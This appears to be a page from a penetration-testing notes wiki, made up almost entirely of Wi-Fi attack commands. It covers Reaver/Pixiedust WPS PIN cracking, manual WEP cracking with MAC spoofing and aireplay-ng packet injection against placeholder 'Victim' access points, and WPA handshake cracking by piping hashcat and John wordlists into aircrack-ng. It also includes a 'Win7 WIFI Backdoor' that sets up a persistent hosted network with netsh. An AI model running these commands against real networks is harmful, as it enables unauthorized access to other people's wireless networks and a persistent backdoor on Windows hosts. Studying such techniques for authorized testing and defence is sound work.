From BHaFSec Pentesting Notes Wiki
Jump to: navigation, search

REAVER / Pixiedust:

reaver -i wlan1mon -c<chan#> -b <MACaddy> -vvv -K 1 

Let’s put the wifi interface in monitoring mode using:

airmon-ng start wlan0

Start airodump-ng to get the BSSID, MAC address and channel of our target.

airodump-ng -i wlan0mon

Now pick the target and use the BSSID and the channel for Reaver:

Reaver -i wlan0mon -b [BSSID] -vv -S -c [AP channel]

We need the PKE, PKR, e-hash 1 & e-hash 2, E-nonce / R-nonce and the authkey from Reaver to use for pixiewps. When using the -P (Pixiedust loop) option, Reaver goes into a loop mode that breaks the WPS protocol by not using M4 message to avoid lockouts. This option can only be used for PixieHash collecting to use with pixiewps.

WEP Cracking - Manually

Setup Wifi card into Monitor Mode and change MAC

ifconfig wlan0 down 
macchanger --mac DE:AD:BE:EF:BA:BE wlan0
airmon-ng start wlan0
airodump-ng wlan0mon

start capture

airodump-ng -c 11 --bssid <VictimMAC> -w output_01 wlan0mon 

ARP packets

aireplay-ng -3 -b <VictimMAC> -h DE:AD:BE:EF:BA:BE wlan0mon 

inject arp

aireplay-ng -1 0 -e <VictimSSID> -a <VictimMAC> -h DE:AD:BE:EF:BA:BE wlan0mon 

for picky access points

aireplay-ng -1 6000 -o 1 -q 10 -e <VictimSSID> -a <VictimMAC> -h DE:AD:BE:EF:BA:BE wlan0mon 

wait for #Data to go over 10000 IVs

crack dat shit

aircrack-ng -b <VictimMAC> output_01-01.cap 

Connect to WIFI without .conf

wpa_passphrase "ESSID" "Password" | wpa_supplicant -Dwext -iwlan0 -c/dev/stdin&

Win7 WIFI Backdoor

netsh wlan set hostednetwork mode=[allow\|disallow]
netsh wlan set hostednetwork ssid=<ssid> key=<password> keyUsage=persistent\|temporary
netsh wlan [start|stop] hostednetwork


./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap